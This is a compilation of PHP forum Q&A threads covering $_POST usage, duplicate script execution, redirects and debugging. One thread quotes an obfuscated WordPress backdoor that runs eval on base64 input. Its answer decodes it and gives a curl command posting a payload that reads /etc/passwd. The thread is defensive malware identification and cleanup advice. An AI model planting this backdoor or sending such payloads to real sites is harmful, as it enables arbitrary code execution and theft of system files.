To start: I am a C++ developer who is roped into making a PHP script (for paypal IPN).
I have been incredibly frustrated witht he lack of good working samples from paypal and elsewhere.
The latest problem is that I seem to not get any of the $HTTP_POST_VARS items that I think I should be getting.
Some searches online seem to indicate that this is either deprecated or configurable, etc.
I have no idea what version of PHP is used at my host.
It seems clear that either my testing applications do not post correctly or the script is not working.
so: 2 questions:
- Does anyone have any links to working IPN scripts?
- What gives with the $HTTP_POST_VARS nonsense?
EDIT
thanks all. I'll try these suggestions out and post up my success story soon I hope.
You can check what version of PHP you are using by typing phpinfo(); into a PHP script block <?php ?> and see what it ouputs (or simply echo PHP_VERSION).
$HTTP_POST_VARS is the old way of doing things. You can use $_POST['post-var']. To examine everything beint posted, use print_r($_POST).
First thing to try is changing $HTTP_POST_VARS to $_POST. That's the new mechanism, and after some version or another $HTTP_POST_VARS stopped being a superglobal.
As chaos already wrote, just use the $_POST array instead of $HTTP_POST_VAR.
Two things i like to mention:
1. var_dump(somevar) function is very helpful in php. It displays structured information about somevar. If you not sure how is some variable or array or what ever is structured, just use this function. So this call var_dump($_POST); will display you all the current POST parameters.
2. phpinfo() function is helpful if you are interested which version and extensions is your host using. Just create a file with <?php phpinfo(); ?> in it and navigate with the browser to this file. Don't forget to remove it after this, because of the security leak.
Related
One of my site was hacked last night and some porno content was placed on my site.
What I have done:
I have removed manually the adult content from site by using FTP.
My website is up now and working fine. But, still I am able to find some code in my plugin and theme files. Which was not written by me, Code is as below:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>
What my queries are:
What this code stands for, what is this doing?
Is this harmful?
Should I remove this code from my files?
Is this will make any effect on my site if removed?
Other Code Suggestions Required:
This sort of code is available in 100+ files. Is there any method to remove code from all files in once? Or any method to keep code and just make it disinfect? so, it will save my time to remove code manually from too much files.
What this code stands for, what is this doing?
This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.
<?php
eval( base64_decode( $_POST['n842e1c'] ) );
An attacker can make a post request to this file with his encoded payload in POST parameter n842e1c and execute PHP code.
Example:
curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
Here this ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the BASE64 encoded string of echo readfile('/etc/passwd');.
Is this harmful?
Yes
Should I remove this code from my files?
Yes
Will this make any effect on my site if removed?
No
Here are some tips to help you clean the website. Also, follow this official post by wordpress to take necessary steps.
It's a backdoor, taking a POST parameter named n842e1c and execute it. Instruction is encoded as Base64.
It is.
You should immediately.
Nothing, remove it asap.
Maybe re-install wordpress, or you could quickly develop a script in python (or something else) to remove this string from your files.
PHP eval is dangerous.
It basically executes the code within it's function. So you must remove it if you are not sure of it's use in your website.
The eval() language construct is very dangerous because it allows
execution of arbitrary PHP code. Its use thus is discouraged. If you
have carefully verified that there is no other option than to use this
construct, pay special attention not to pass any user provided data
into it without properly validating it beforehand.
Source
You can not disable it directly so the only choice is you remove the code from all the files.
Try installing these free plugins on your Website.
Sucuri WordPress Auditing and Theme Authenticity Checker (TAC).
Follow below URLs to get some help.
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/
My web server is acting wierd. It seems like it executes scripts (PHP) twice before sending then to apache.
I've run this file:
<?php
echo '<pre>';
session_start();
$_SESSION['index']++;
echo '<br>';
print_r($_SESSION);
?>
And I know that ++ will give a notice at first, but it's just to investigate if it runs twice. Anyway, the printed session shows that the index-index increases by two each time you load the page.
The webserver is apache2, php5 installed on a debian unit.
Anyone has any ideas?
echo '<pre>'; //Headers and cookies already sent.
session_start(); //Cannot set cookie anymore, system tries again, I guess
Start session first, then output anything.
Try placing session_start(); on top
I can't thank the poster of this question enough. His session test made me realize that I had the same problem of a php script running several times.
In my script I had two PDO functions seperated from each other by an if-else-construct. One was a simple select, and one a simple insert function. But everytime I ran the script, both pdo commands got executed. PDO ended up writing rows in my table which had the entry 'public'.
So what happened? My page got send multiple times because of ELEMENTS IN THE HTML CODE THAT COULD NOT BE FOUND. In my case that was a css file which was named incorrectly. When I solved that (after 4 hours of looking at code) the problem disappeared. Also broken images for example trigger the same event.
Oke folks, found a completely insane solution to this problem. Just posting for future reference. I recently installed a HTML validator in Chrome (an extension). This seems to be the culprit. After everything has loaded, the validator seems to be re-requesting the page so it is executed twice.
Nice plugin. Not!
Took me about half a day to figure this out.
I am seeing the same behaviour... a $_POST would be present the first time the page ran, then wouldn't the second time... scoured the code to find why the page might be posting back to itself again. No avail.
After seeing user1601869's answer above, I started checking. I had some links to stylesheets I hadn't written yet, so put skeletons of those in.
It turns out that for me, the culprit was:
<link rel="shortcut icon" href="">
This was just a placeholder for an icon that was causing my page to break. I suggest that if you have the same problem, look for links in the <HEAD></HEAD> that are broken!
Is there a way to redirect using PHP without using header("Location: http://www.google.com")? I put that at the top, right after a PHP script (which has no output), but it doesn't work. I use the PHP to check something in the database, and it will redirect depending on the contents.
"Right after a PHP script"? Well, it's going to have to be in a PHP script to work.
If that's not it, please consider showing your previous code. Remember, don't post a question asking how to implement your solution, but rather the question itself...
Your code should always work as long as the header is called before any echo or print statements that send output to the browser. Another possibility is your webserver sending out additional output or headers that are causing the redirect to not work.
One way to test would be to telnet to your webserver and send GET /myscript.php. Then view the result and see if it is what you expect.
Per the PHP documentation:
Remember that header() must be called before any actual output is
sent, either by normal HTML tags, blank lines in a file, or from PHP.
It is a very common error to read code with include(), or require(),
functions, or another file access function, and have spaces or empty
lines that are output before header() is called. The same problem
exists when using a single PHP/HTML file.
Without seeing the actual code that the redirect resides in it will be difficult to assist. Perhaps if you could provide more details then someone may be able to suggest another technology to help but the header method is the only one that I've came across.
I have a basic Autocomplete and Add to the database function and , for some reason, it has stopped working completely and I don't get any useful information from Firebug or otherwise what could be the problem.
I am guessing it is something simple, but don't know where to look.
This is the library where I am making the call:
http://github.com/allyforce/AF-upload/blob/master/Library/Target1.class.php
What browser are you debugging on? Firefox displays Ajax errors correctly, but no others do unless you apply this patch (which will be in the next release of QCubed):
http://trac.qcu.be/projects/qcubed/ticket/432
Someone found the right answer in terms of remvoing a QEvent.
i am pulling apart a third party shopping cart and they have included a bunch of junk (as usual) aside from having to remove and bring back pieces of code to see what it does. is it possible to execute a few lines?
although setting up comments on codes i dont want to execute sounds good which i just thought of :p
but what other things exist that you guys know of?
thanks
This may be obvious but you can use a debugger (eclipse php or netbeans) and just put breakpoints after certain parts and "run to" that portion of the code. From there you can evaluate variables and potentially see output as it happens.
I don't know about codepad but I'm pretty sure Dreamweaver doesn't have a native PHP debugger built in. Take look at Xdebug or the Zend IDE.